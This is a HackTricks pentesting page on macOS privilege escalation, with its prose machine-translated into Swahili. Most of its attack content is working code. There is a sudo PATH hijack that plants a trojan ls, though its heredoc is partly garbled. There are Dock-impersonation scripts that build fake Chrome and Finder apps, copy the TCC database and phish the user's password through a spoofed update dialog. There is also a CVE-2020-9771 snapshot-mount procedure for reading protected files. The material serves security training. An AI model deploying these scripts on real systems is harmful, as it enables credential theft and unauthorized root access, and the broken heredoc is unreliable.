# macOS Privilege Escalation {{#include ../../banners/hacktricks-training.md}} ## TCC Privilege Escalation Ikiwa umekuja hapa kutafuta TCC privilege escalation nenda kwa: {{#ref}} macos-security-protections/macos-tcc/ {{#endref}} ## Linux Privesc Tafadhali kumbuka kwamba **mbinu nyingi za privilege escalation zinazohusiana na Linux/Unix pia zitaathiri mashine za MacOS**. Hivyo angalia: {{#ref}} ../../linux-hardening/privilege-escalation/ {{#endref}} ## User Interaction ### Sudo Hijacking Unaweza kupata mbinu ya asili ya [Sudo Hijacking ndani ya chapisho la Linux Privilege Escalation](../../linux-hardening/privilege-escalation/index.html#sudo-hijacking). Hata hivyo, macOS **inaendelea** na **`PATH`** ya mtumiaji anapotekeleza **`sudo`**. Ambayo inamaanisha kwamba njia nyingine ya kufanikisha shambulio hili ingekuwa **kudukua binaries nyingine** ambazo mwathirika bado atatekeleza anapokuwa **akifanya sudo:** ```bash # Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH cat > /opt/homebrew/bin/ls < /tmp/privesc fi /bin/ls "\$@" EOF chmod +x /opt/homebrew/bin/ls # victim sudo ls ``` Kumbuka kwamba mtumiaji anayetumia terminal kwa uwezekano mkubwa atakuwa na **Homebrew installed**. Hivyo inawezekana kuiba binaries katika **`/opt/homebrew/bin`**. ### Dock Impersonation Kwa kutumia **social engineering** unaweza **kujifanya mfano Google Chrome** ndani ya dock na kwa kweli kutekeleza script yako mwenyewe: {{#tabs}} {{#tab name="Chrome Impersonation"}} Mapendekezo kadhaa: - Angalia katika Dock kama kuna Chrome, na katika hali hiyo **ondoa** ile entry na **ongeza** ile **fake** **Chrome entry katika nafasi ile ile** katika Dock array. ```bash #!/bin/sh # THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON) # If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%'; rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null # Create App structure mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS mkdir -p /tmp/Google\ Chrome.app/Contents/Resources # Payload to execute cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c < #include #include int main() { char *cmd = "open /Applications/Google\\\\ Chrome.app & " "sleep 2; " "osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; " "PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); " "echo \$PASSWORD > /tmp/passwd.txt"; system(cmd); return 0; } EOF gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome # Info.plist cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist CFBundleExecutable Google Chrome CFBundleIdentifier com.google.Chrome CFBundleName Google Chrome CFBundleVersion 1.0 CFBundleShortVersionString 1.0 CFBundleInfoDictionaryVersion 6.0 CFBundlePackageType APPL CFBundleIconFile app EOF # Copy icon from Google Chrome cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns # Add to Dock defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/tmp/Google Chrome.app_CFURLStringType0' sleep 0.1 killall Dock ``` {{#endtab}} {{#tab name="Finder Impersonation"}} Baadhi ya mapendekezo: - Huwezi kuondoa Finder kutoka kwenye Dock, hivyo ikiwa unataka kuiongeza kwenye Dock, unaweza kuweka Finder bandia karibu na ile halisi. Kwa hili unahitaji **kuongeza kipengee cha Finder bandia mwanzoni mwa orodha ya Dock**. - Chaguo lingine ni kutokuweka kwenye Dock na kuifungua tu, "Finder inahitaji kudhibiti Finder" si ajabu sana. - Chaguo lingine ili **kuinua hadhi hadi root bila kuomba** nenosiri kwa sanduku mbaya, ni kufanya Finder kweli kuomba nenosiri ili kutekeleza kitendo cha kibali: - Omba Finder nakala kwenda **`/etc/pam.d`** faili mpya ya **`sudo`** (Kichocheo kinachoomba nenosiri kitaonyesha kwamba "Finder inataka kunakili sudo") - Omba Finder nakala faili mpya ya **Authorization Plugin** (Unaweza kudhibiti jina la faili ili kichocheo kinachoomba nenosiri kitaonyesha kwamba "Finder inataka kunakili Finder.bundle") ```bash #!/bin/sh # THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON) # If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%'; rm -rf /tmp/Finder.app/ 2>/dev/null # Create App structure mkdir -p /tmp/Finder.app/Contents/MacOS mkdir -p /tmp/Finder.app/Contents/Resources # Payload to execute cat > /tmp/Finder.app/Contents/MacOS/Finder.c < #include #include int main() { char *cmd = "open /System/Library/CoreServices/Finder.app & " "sleep 2; " "osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; " "PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); " "echo \$PASSWORD > /tmp/passwd.txt"; system(cmd); return 0; } EOF gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c chmod +x /tmp/Finder.app/Contents/MacOS/Finder # Info.plist cat << EOF > /tmp/Finder.app/Contents/Info.plist CFBundleExecutable Finder CFBundleIdentifier com.apple.finder CFBundleName Finder CFBundleVersion 1.0 CFBundleShortVersionString 1.0 CFBundleInfoDictionaryVersion 6.0 CFBundlePackageType APPL CFBundleIconFile app EOF # Copy icon from Finder cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns # Add to Dock defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/tmp/Finder.app_CFURLStringType0' sleep 0.1 killall Dock ``` {{#endtab}} {{#endtabs}} ## TCC - Kuinua Privilege ya Root ### CVE-2020-9771 - mount_apfs TCC bypass na kuinua privilege **Mtumiaji yeyote** (hata wasio na mamlaka) anaweza kuunda na kuunganisha picha ya mashine ya wakati na **kufikia FAILI ZOTE** za picha hiyo.\ **Mamlaka pekee** inayohitajika ni kwa programu inayotumika (kama `Terminal`) kuwa na **Upatikanaji wa Diski Kamili** (FDA) (`kTCCServiceSystemPolicyAllfiles`) ambayo inahitaji kupewa na admin. ```bash # Create snapshot tmutil localsnapshot # List snapshots tmutil listlocalsnapshots / Snapshots for disk /: com.apple.TimeMachine.2023-05-29-001751.local # Generate folder to mount it cd /tmp # I didn it from this folder mkdir /tmp/snap # Mount it, "noowners" will mount the folder so the current user can access everything /sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap # Access it ls /tmp/snap/Users/admin_user # This will work ``` Maelezo ya kina zaidi yanaweza kupatikana [**katika ripoti ya asili**](https://theevilbit.github.io/posts/cve_2020_9771/)**.** ## Taarifa Nyeti Hii inaweza kuwa na manufaa kuongeza mamlaka: {{#ref}} macos-files-folders-and-binaries/macos-sensitive-locations.md {{#endref}} {{#include ../../banners/hacktricks-training.md}}